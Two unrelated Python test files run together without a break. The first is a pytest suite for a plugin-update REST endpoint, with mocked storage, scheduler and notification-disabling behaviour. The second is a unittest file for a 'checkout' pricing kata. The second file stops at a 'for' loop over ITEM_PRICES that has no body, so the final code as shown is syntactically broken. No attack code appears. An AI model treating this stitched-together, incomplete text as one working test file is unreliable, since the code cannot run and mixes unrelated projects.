@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_package_already_in_progress(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
msg = '{} package update already in progress'.format(pkg_name)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await async_mock(select_row_resp)
else:
_rv = asyncio.ensure_future(async_mock(select_row_resp))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=_rv) as query_tbl_patch:
resp = await client.put('/fledge/plugins/{}/{}/update'.format(_type, plugin_installed_dirname),
data=None)
assert 429 == resp.status
assert msg == resp.reason
r = await resp.text()
actual = json.loads(r)
assert {'message': msg} == actual
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_not_found(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
plugin_name = 'sinusoid'
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_name, "type": _type, "description": "{} plugin".format(_type),
"version": "1.8.1", "installedDirectory": "{}/{}".format(_type, plugin_name),
"packageName": pkg_name}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await async_mock({'count': 0, 'rows': []})
else:
_rv = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=_rv) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
resp = await client.put('/fledge/plugins/{}/{}/update'.format(_type, plugin_installed_dirname),
data=None)
assert 404 == resp.status
assert "'{} plugin is not yet installed. So update is not possible.'".format(
plugin_installed_dirname) == resp.reason
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_update_when_not_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_update_when_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "purge",
"status": 0,
"log_file_uri": ""
}]}
delete = {"response": "deleted", "rows_affected": 1}
delete_payload = {"where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [
{"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578", "name": plugin_installed_dirname, "action": "update",
"status": -1, "log_file_uri": ""}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]
server.Server.scheduler = Scheduler(None, None)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_rv4 = await async_mock(delete)
_rv5 = await async_mock((True, "Schedule successfully disabled"))
_se1 = await async_mock(select_row_resp)
_se2 = await async_mock(insert_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_rv4 = asyncio.ensure_future(async_mock(delete))
_rv5 = asyncio.ensure_future(async_mock((True, "Schedule successfully disabled")))
_se1 = asyncio.ensure_future(async_mock(select_row_resp))
_se2 = asyncio.ensure_future(async_mock(insert_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se2]) as query_tbl_patch:
with patch.object(storage_client_mock, 'delete_from_tbl',
return_value=_rv4) as delete_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=_rv5) as disable_sch_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
server.Server.scheduler = None
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith(
'fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} {} instance, as {} plugin is being updated...'.format(
svc_name, _type, plugin_installed_dirname))
disable_sch_patch.assert_called_once_with(uuid.UUID(sch_info[0]['id']))
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = delete_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert delete_payload == json.loads(args[1])
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
async def test_filter_plugin_update_when_not_in_use(self, client, _type='filter', plugin_installed_dirname='delta'):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
filter_row = {'count': 1, 'rows': [{'name': plugin_installed_dirname}]}
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}, {'plugin': plugin_installed_dirname,
'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(filter_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(filter_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
async def test_filter_update_when_in_use(self, client, _type='filter', plugin_installed_dirname='delta'):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "purge",
"status": 0,
"log_file_uri": ""
}]}
filter_row = {'count': 1, 'rows': [{'name': plugin_installed_dirname}]}
delete = {"response": "deleted", "rows_affected": 1}
delete_payload = {"where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [
{"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578", "name": plugin_installed_dirname, "action": "update",
"status": -1, "log_file_uri": ""}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}, {'plugin': plugin_installed_dirname,
'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]
server.Server.scheduler = Scheduler(None, None)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_rv4 = await async_mock(delete)
_rv5 = await async_mock((True, "Schedule successfully disabled"))
_se1 = await async_mock(select_row_resp)
_se2 = await async_mock(insert_row)
_se3 = await async_mock(filter_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_rv4 = asyncio.ensure_future(async_mock(delete))
_rv5 = asyncio.ensure_future(async_mock((True, "Schedule successfully disabled")))
_se1 = asyncio.ensure_future(async_mock(select_row_resp))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(filter_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(storage_client_mock, 'delete_from_tbl',
return_value=_rv4) as delete_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=_rv5) as disable_sch_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
server.Server.scheduler = None
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith(
'fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} {} instance, as {} plugin is being updated...'.format(
svc_name, _type, plugin_installed_dirname))
disable_sch_patch.assert_called_once_with(uuid.UUID(sch_info[0]['id']))
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = delete_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert delete_payload == json.loads(args[1])
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('notify', 'Telegram'),
('rule', 'OutOfBound')
])
async def test_notify_plugin_update_when_not_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
_type = "notify"
plugin_type_installed_dir = "notificationRule" if _type == 'rule' else "notificationDelivery"
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} C plugin".format(plugin_type_installed_dir), "version": "1.8.1",
"installedDirectory": "{}/{}".format(plugin_type_installed_dir, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
sch_info = {'count': 1, 'rows': [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]}
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(sch_info)
else:
_rv1 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(sch_info))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv1) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
plugin_installed_patch.assert_called_once_with(plugin_type_installed_dir, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('notify', 'alexa'),
('rule', 'OutOfBound')
])
async def test_notify_plugin_update_when_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
plugin_type_installed_dir = "notificationRule" if _type == 'rule' else "notificationDelivery"
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "Generate a notification if the values exceeds a configured value",
"version": "1.8.1", "installedDirectory": "{}/{}".format(plugin_type_installed_dir,
plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
notification_name = "Test Notification"
parent_name = "Notifications"
sch_info = {'count': 1, 'rows': [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]}
read_all_child_category_names = [{"parent": parent_name, "child": notification_name}]
read_cat_val = {"name": {"description": "The name of this notification", "type": "string",
"default": notification_name, "value": notification_name},
"description": {"description": "Description of this notification", "type": "string",
"default": "description", "value": "description"},
"rule": {"description": "Rule to evaluate", "type": "string",
"default": plugin_installed_dirname, "value": plugin_installed_dirname},
"channel": {"description": "Channel to send alert on", "type": "string",
"default": "email", "value": "email"},
"notification_type": {"description": "Type of notification", "type": "enumeration",
"options": ["one shot", "retriggered", "toggled"], "default": "one shot",
"value": "one shot"}, "enable": {"description": "Enabled",
"type": "boolean", "default": "true",
"value": "true"}}
disable_notification = {"description": "Enabled", "type": "boolean", "default": "true", "value": "false"}
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(read_all_child_category_names)
_rv2 = await async_mock(read_cat_val)
_rv3 = await async_mock(disable_notification)
_rv4 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(sch_info)
else:
_rv1 = asyncio.ensure_future(async_mock(read_all_child_category_names))
_rv2 = asyncio.ensure_future(async_mock(read_cat_val))
_rv3 = asyncio.ensure_future(async_mock(disable_notification))
_rv4 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(sch_info))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(ConfigurationManager, '_read_all_child_category_names',
return_value=_rv1) as child_cat_patch:
with patch.object(ConfigurationManager, '_read_category_val',
return_value=_rv2) as cat_value_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(ConfigurationManager, 'set_category_item_value_entry',
return_value=_rv3) as set_cat_value_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv4) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
set_cat_value_patch.assert_called_once_with(notification_name, 'enable', 'false')
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} notification instance, as {} {} plugin is being updated...'.format(
notification_name, plugin_installed_dirname, _type))
cat_value_patch.assert_called_once_with(notification_name)
child_cat_patch.assert_called_once_with(parent_name)
plugin_installed_patch.assert_called_once_with(plugin_type_installed_dir, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
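The `_rv*`/`_se*` setup at the top of this test exists to wrap plain return values in something awaitable for the patched coroutines, with one branch per Python-version behaviour. A minimal standalone sketch of that idea — assuming `async_mock` is simply a coroutine that returns its argument (the real helper is defined outside this excerpt), and using a hypothetical `awaitable_result` name for the wrapper — is:

```python
import asyncio
import sys

async def async_mock(return_value):
    # Assumed shape of the async_mock helper used above: a coroutine
    # that simply hands back its argument when awaited.
    return return_value

def awaitable_result(value):
    # Hypothetical wrapper mirroring the if/else above: on Python 3.8+
    # a patched attribute can return the bare coroutine, while older
    # versions need it scheduled as a Future first.
    if sys.version_info >= (3, 8):
        return async_mock(value)
    return asyncio.ensure_future(async_mock(value))

async def main():
    rows = await awaitable_result({'count': 0, 'rows': []})
    print(rows)  # prints {'count': 0, 'rows': []}

asyncio.run(main())
```

The version split matters because `unittest.mock` only grew native coroutine support (`AsyncMock`) in Python 3.8; before that, a scheduled `Future` was the usual way to make a mock's return value awaitable.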
import unittest
from checkout_solution import checkout, ITEM_PRICES
class TestCheckout(unittest.TestCase):
@unittest.skip("Not testing this round right now")
def test_round_1(self):
self.assertEqual(
checkout("ABCDABCDABCDA"),
130 + 50 + 45 + 30 + 20 * 3 + 15 * 3
)
self.assertEqual(checkout("CAABAAAAB"), 20 + 130 * 2 + 45)
self.assertEqual(checkout("WOOF"), -1)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
@unittest.skip("Not testing this round right now")
def test_round_3(self):
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout("WOOF"), -1)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
@unittest.skip("Not testing this round right now")
def test_round_4(self):
self.assertEqual(checkout("F" * 3), 20)
self.assertEqual(checkout("F" * 4), 30)
self.assertEqual(checkout("F" * 2), 20)
self.assertEqual(checkout("BB"), 45)
self.assertEqual(checkout("B"), 30)
self.assertEqual(checkout("BBB"), 45 + 30)
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
        # Each single SKU should price at its base ITEM_PRICES entry.
        for sku, price in ITEM_PRICES.items():
            self.assertEqual(checkout(sku), price)
self.assertEqual(checkout("V" * 3), 130)
self.assertEqual(checkout("V" * 2), 90)
self.assertEqual(checkout("V" * 5), 130 + 90)
self.assertEqual(checkout("V" * 6), 130 * 2)
self.assertEqual(checkout("V" * 7), 130 * 2 + 50)
def test_round_5(self):
self.assertEqual(checkout("F" * 3), 20)
self.assertEqual(checkout("F" * 4), 30)
self.assertEqual(checkout("F" * 2), 20)
self.assertEqual(checkout("BB"), 45)
self.assertEqual(checkout("B"), 30)
self.assertEqual(checkout("BBB"), 45 + 30)
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
        # Each single SKU should price at its base ITEM_PRICES entry.
        for sku, price in ITEM_PRICES.items():
